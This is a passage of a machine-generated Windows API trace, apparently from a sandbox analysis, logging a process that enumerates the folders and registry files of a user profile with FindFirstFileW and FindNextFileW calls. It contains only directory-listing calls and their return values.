dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0052.345] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a6db40, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1a6db40, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0052.346] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0052.347] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0052.347] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0052.347] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0052.347] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1b9e640, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1b9e640, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0052.347] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0052.348] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1b2c220, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1b2c220, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0052.349] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1b2c220, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1b2c220, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0052.349] FindClose (in: hFindFile=0x1a5ddfd0 | out: hFindFile=0x1a5ddfd0) returned 1 [0052.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e3d0) returned 1 [0052.349] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5e390) returned 1 [0052.349] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5e480) returned 1 [0052.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", nBufferLength=0x105, lpBuffer=0x1bf5df70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFilePart=0x0) returned 0x1d [0052.349] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", nBufferLength=0x105, lpBuffer=0x1bf5df10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpFilePart=0x0) returned 0x1e [0052.349] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x1bf5e120 | out: lpFindFileData=0x1bf5e120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a5ddfd0 [0052.349] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.349] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf8c63880, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf8c63880, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1538b20, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1538b20, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0052.350] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x2914fe20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf1a6db40, ftLastAccessTime.dwHighDateTime=0x1d53bb1, ftLastWriteTime.dwLowDateTime=0xf1a6db40, ftLastWriteTime.dwHighDateTime=0x1d53bb1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2c30f920, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2c30f920, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x100000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2c16ca00, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28f60c40, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0052.351] FindNextFileW (in: hFindFile=0x1a5ddfd0, lpFindFileData=0x1bf5e170 | out: lpFindFileData=0x1bf5e170*(dwFileAttributes=0x26, 